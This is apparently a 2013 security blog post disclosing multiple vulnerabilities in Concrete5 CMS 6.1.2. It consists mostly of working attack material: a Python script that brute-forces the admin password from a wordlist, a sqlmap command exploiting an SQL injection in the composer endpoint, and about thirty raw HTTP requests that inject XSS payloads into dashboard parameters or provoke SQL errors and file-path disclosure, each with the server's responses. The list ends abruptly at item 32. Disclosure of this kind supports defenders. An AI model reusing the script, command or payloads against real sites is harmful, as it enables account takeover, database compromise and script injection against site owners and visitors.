Monday 12 August 2013

[EN] Concrete5 6.1.2 Multiple Bugs

From SQL injection via multiple XSS to information gathering...
Enjoy:


Starting from description of bugs available for admin user logged-in I should mention
that there is no anti-bruteforce mechanizm, so if admins password is 'simple',
we can crack it, like it was described below:

Searching admin's password in Concrete5 CMS

Code to test it:
---< code >---
root@bt:/pentest/web/scanners/sqlmap# cat /root/src/concrete5612bf.py


#!/usr/bin/env python
# code after a little update : 14.08 ;)
#
import requests
import sys

username = 'admin'
path = '/index.php/login/do_login/'

print '\n_________________________________________________'
print '>>>\t Concrete5 6.1.2 CMS login-tester.\t<<<\n'
print 'If login:pass match, you can use sql injection attack\nfor admin user part of webapp.\n\n'

pwdfile = open('passwords.txt','r')
read_pass = pwdfile.readlines()

for test_pass in read_pass:
  url = sys.argv[1]+path

  data = {
        'uName':username,
        'uPassword':test_pass,
        'rcID':'',
        'submit':'Sign+In+%3E',
  }

  get_cookies = requests.post(url)
  conn = requests.post(url, data=data, cookies=get_cookies.cookies)

  print '[ > ] Status code for this request: ', conn.status_code

  lines = conn.content

  if 'Currently' in lines:
    print '[+] Logged in as: [', username, '] with password: [', test_pass,']'



---< code >---

So if we will have an admin password, we can start from...

 1. SQL injection 
---< request >---
POST /concrete5/concrete5.6.1.2//index.php/dashboard/composer/write/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 2223

-----------------------------289491801917736
Content-Disposition: form-data; name="ccm-publish-draft"

1
-----------------------------289491801917736
Content-Disposition: form-data; name="cName"

qweqweqweqwe
-----------------------------289491801917736
Content-Disposition: form-data; name="cHandle"

qweqweqweqwe
-----------------------------289491801917736
Content-Disposition: form-data; name="cDescription"

qweqweqweqwe
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_dt"

8/12/2013
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_h"

11
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_m"

14
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_a"

AM
-----------------------------289491801917736
Content-Disposition: form-data; name="fType"

1
-----------------------------289491801917736
Content-Disposition: form-data; name="_bf[BLOCK_57_170][fID]"

'%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e
-----------------------------289491801917736
Content-Disposition: form-data; name="fType"

1
-----------------------------289491801917736
Content-Disposition: form-data; name="_bf[BLOCK_58_170][fID]"

8
-----------------------------289491801917736
Content-Disposition: form-data; name="fType"

1
-----------------------------289491801917736
Content-Disposition: form-data; name="_bf[BLOCK_59_170][content]"

<p>This is my first blog post.</p>
-----------------------------289491801917736
Content-Disposition: form-data; name="newAttrValueRows14"


-----------------------------289491801917736
Content-Disposition: form-data; name="ccm-submit-publish"

Publish Changes
-----------------------------289491801917736
Content-Disposition: form-data; name="entryID"

170
-----------------------------289491801917736
Content-Disposition: form-data; name="autosave"

0
-----------------------------289491801917736
Content-Disposition: form-data; name="ccm_token"

1376298893:60a85801b0c4f4b73d887a387b4a0aa2
-----------------------------289491801917736--
---< request >---
 

Because "_bf[BLOCK_" parameters are not properly filtered, we can use it to generate sql error, like this:


---< response >---

<div class="ccm-error block-message alert-message error">mysql error: [1064: You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near
''%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e,fOnstateID=0,maxWidth=0,' at line 1] in
EXECUTE("UPDATE btContentImage SET fID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e,
fOnstateID=0,maxWidth=0,maxHeight=0,externalLink='',internalLinkCID=0,forceImageToMatchDimensions=NULL,altText=NULL WHERE bID=57")
</div><p><a href="http://10.149.14.52/concrete5/concrete5.6.1.2/" class="btn">&lt; Back to Home</a></p>
</div>

---< response >---


To reproduce this vulnerability you can use sqlmap tool:

root@bt:/pentest/web/scanners/sqlmap# ./sqlmap.py -u "http://10.149.14.52/concrete5/concrete5.6.1.2//index.php/dashboard/composer/write/save/"
--data "ccm-publish-draft=1&cName=qweqweqweqwe&cHandle=qweqweqweqwe&cDescription=qweqweqweqwe&cDatePublic_dt=
8/12/2013&cDatePublic_h=11&cDatePublic_m=14&cDatePublic_a=AM&fType=1&_bf[BLOCK_57_170][fID]=4&fType=1&_bf[BLOCK_58_170][fID]=8
&fType=1&_bf[BLOCK_59_170][content]=<p>This is my first blog post.</p>&newAttrValueRows14=&ccm-submit-publish=Publish Changes&entryID=170
&autosave=0&ccm_token=1376298893:60a85801b0c4f4b73d887a387b4a0aa2" --cookie "CONCRETE5=obo3k5oa1b23mdfkmjai0ka8n3;
CONCRETE5=p5kvcagr4fv6n9p75ojqdbst25; CONCRETE5_INSTALL_TEST=1"

Example of SQL Injection



2.  DOM-based XSS
---< request >---

POST /concrete5/concrete5.6.1.2/index.php/tools/required/files/importers/single HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1119

-----------------------------55721791519552
Content-Disposition: form-data; name="Filedata"; filename="2ASK.txt"
Content-Type: text/plain

sialala cze;]
-----------------------------55721791519552
Content-Disposition: form-data; name="searchInstance"

');</script><script>alert(2);</script>//
-----------------------------55721791519552
Content-Disposition: form-data; name="ccm_token"

1376287516:62ba4fa101db6bfb5a15c832e2839c1b
-----------------------------55721791519552
Content-Disposition: form-data; name="ocID"


-----------------------------55721791519552--
---< request >---


---< response >---
window.parent.ccm_filesUploadedDialog('');</script><script>alert(2);</script>//');
---< response >---

3. sql error to check

---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/pages/search_results?searchInstance=page1376287517&submit_search=1&ccm_order_dir=&ccm_order_by=&cvName=asd&ctID=&numResults=11111111111111111111111&ccm-search-pages=Search&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


resp:

<h1>An unexpected error occurred.</h1>

<div class="ccm-error block-message alert-message error">mysql error: [1064: You have an error in your SQL syntax; check
the manual that corresponds to your MySQL server version for the right syntax to use near '11111111111111111111111' at line 1]
in EXECUTE("select p1.cID, pt.ctHandle  from Pages p1 left join PagePaths on (PagePaths.cID = p1.cID and PagePaths.ppIsCanonical = 1) left
join PageSearchIndex psi on (psi.cID = p1.cID) inner join CollectionVersions cv on (cv.cID = p1.cID and cvID = (select max(cvID) from CollectionVersions
where cID = cv.cID)) left join PageTypes pt on (pt.ctID = cv.ctID)  inner join Collections c on (c.cID = p1.cID) left join CollectionSearchIndexAttributes on
(CollectionSearchIndexAttributes.cID = p1.cID)  where 1=1 and cvName like '%asd%' and (p1.cPointerID < 1 or p1.cPointerID is null) and p1.cIsTemplate = '0'
and p1.cIsActive = '1' and (p1.cIsSystemPage = 0) limit 0,11111111111111111111111 ")
</div><p><a href="http://10.149.14.52/concrete5/concrete5.6.1.2" class="btn">&lt; Back to Home</a></p>
</div>




4. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search="><script>alert(22)</script>XXX&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


5. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir="><script>alert(1)</script>&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


6. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by="><script>alert(4)</script>&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


7. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector="><script>alert(5)</script>&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


8. information disclosure:
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults='%3e"%3e&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---

resp:


Warning: Division by zero in /var/www/concrete5/concrete5.6.1.2/concrete/core/libraries/item_list.php on line 263
<div class="ccm-paging-top">Viewing <b>1</b> to <b><span id="pagingPageResults">0</span></b> (<b><span id="pagingTotalResults">54</span></b> Total)</div></div>

</div>
<div class="ccm-pane-footer">

9. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField="><script>alert(33)</script>"%3eXXX&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


10. information disclosure:
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---

resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 06:25:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 191
Connection: close
Content-Type: text/html


Fatal error: Call to a member function getAttributeType() on a non-object in /var/www/concrete5/concrete5.6.1.2/concrete/core/controllers/single_pages/dashboard/files/search.php on line 134


11. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search="><script>alert(1111)</script>&fType=&fExtension=&ccm_order_dir=&ccm_order_by=&fileSelector=&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


12. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&ccm_order_dir="><script>alert(123)</script>&ccm_order_by=&fileSelector=&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


13. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&ccm_order_dir=&ccm_order_by="><script>alert(/1/)</script>XXX&fileSelector=&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


14. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&ccm_order_dir=&ccm_order_by=&fileSelector="><script>alert(2)</script>&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


15. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/save_mobile_theme/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 94

MOBILE_THEME_ID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&save_mobile_theme=Save
---< request >---

16. XSS in SQL query error msg:
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/types/add/do_add/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 187

ccm_token=1376290923%3Acf6fd358ef1afdfbf6d0206725a108b4&task=add&ctName=asdasdasd&ctHandle=asdasdasdasd&ctIcon='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&ccm-submit-add_page_type=Add
---< request >---

resp:
       
    <div class="alert alert-error"><button type="button" class="close" data-dismiss="alert">×</button>
            mysql error: [1062: Duplicate entry 'asdasdasdasd' for key 'ctHandle'] in EXECUTE("insert into PageTypes (ctHandle, ctName, ctIcon, ctIsInternal, pkgID) values ('asdasdasdasd', 'asdasdasd', '\'>\"><body onload=alert(/4321/)>', 0, 0)")
<br/>
        </div>
       

       
17. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/users/attributes/edit/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 314

akID=10&akHandle=profile_private_messages_enabled&akName=%2f#%3csvg%2fonload%3dalert(4321)%3e&asID=0&akIsSearchableIndexed=1&akIsSearchable=1&atID=3&akCategoryID=2&ccm_token=1376290584%3A871b3d29741d11ea375c5803f202ce16&uakProfileEdit=1&uakRegisterEdit=1&akCheckedByDefault=1&ccm-submit-ccm-attribute-key-form=Save
---< request >---

18. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 971

input_theme_style_body-background_1='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---


resp:


<input type="hidden" name="input_theme_style_body-background_1" id="input_theme_style_body-background_1" value="'>"><img/src="x"/onerror="alert(4321)">" />                       
<div class="ccm-theme-style-color " id="theme_style_body-background_1"><div hex-color="'>"><img/src="x"/onerror="alert(4321)">" style="background-color: '>"><img/src="x"/onerror="alert(4321)">"></div></div>
                       
                       
19. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 963

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---

20. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 966

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---

21. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 963

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---

22. information disclosure:
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/permissions/categories/block_type?ccm_token=1376291705:b56babf6af36363f211c7996e6986f60&task=save_permission&pkID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
(...)
Cache-Control: no-cache

paID=60&blockTypesIncluded%5B1%5D=A
---< request >---

resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 07:15:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 359
Connection: close
Content-Type: text/html


Catchable fatal error: Argument 2 passed to Concrete5_Model_PermissionAccess::getByID() must be an instance of PermissionKey, null given, called in /var/www/concrete5/concrete5.6.1.2/concrete/tools/permissions/categories/block_type.php on line 23 and defined in /var/www/concrete5/concrete5.6.1.2/concrete/core/models/permission/access/model.php on line 206


23. information disclosure:
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/permissions/categories/block_type?ccm_token=1376291705:b56babf6af36363f211c7996e6986f60&task=save_permission&pkID=16 HTTP/1.1
Host: 10.149.14.52
(...)
Cache-Control: no-cache

paID="%20body%20onload%3d"alert(4321)"%3e&blockTypesIncluded%5B1%5D=A
---< request >---


resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 07:16:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 165
Connection: close
Content-Type: text/html


Fatal error: Call to a member function save() on a non-object in /var/www/concrete5/concrete5.6.1.2/concrete/tools/permissions/categories/block_type.php on line 24

24. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1033

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%27%3e%22%3e%3c%69%6d%67%2f%73%72%63%3d%22%78%22%2f%6f%6e%65%72%72%6f%72%3d%22%61%6c%65%72%74%28%34%33%32%31%29%22%3e&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---


25. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 966

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization

26. xss
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 963

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---


27. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 965

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---


28. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 952

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1="%20body%20onload%3d"alert(4321)"%3e&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---

29. information disclosure
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/permissions/access_entity HTTP/1.1
Host: 10.149.14.52
(...)
Cache-Control: no-cache

task=save_permissions&accessType=10&peID=6&pdID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&pdStartDate_activate=on&pdStartDate_dt=8%2F12%2F2013&pdStartDate_h=9&pdStartDate_m=16&pdStartDate_a=AM&pdEndDate_activate=on&pdEndDate_dt=8%2F12%2F2013&pdEndDate_h=9&pdEndDate_m=16&pdEndDate_a=AM&pdRepeatPeriod=&pdRepeatPeriodDaysEvery=1&pdRepeatPeriodMonthsRepeatBy=month&pdRepeatPeriodMonthsEvery=1&pdRepeatPeriodWeeksDays%5B%5D=1&pdRepeatPeriodWeeksEvery=1&pdEndRepeatDate=
---< request >---


resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 07:19:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 172
Connection: close
Content-Type: text/html


Fatal error: Call to a member function setStartDateAllDay() on a non-object in /var/www/concrete5/concrete5.6.1.2/concrete/core/models/permission/duration.php on line 205


30. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/basics/site_name/update_sitename/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 142

ccm_token=1376292237%3A47e17cc29a3b0e20cd35e618aebc20d8&SITE='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&ccm-submit-site-form=Save
---< request >---

31. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/seo/tracking_codes/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: application/x-www-form-urlencoded
Content-Length: 190

ccm_token=1376292246%3A18fb91291997356ac1a2f84e7edd3e07&tracking_code='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&tracking_code_position=bottom&ccm-submit-tracking-code-form=Save
---< request >---


32. xss
---< request >---
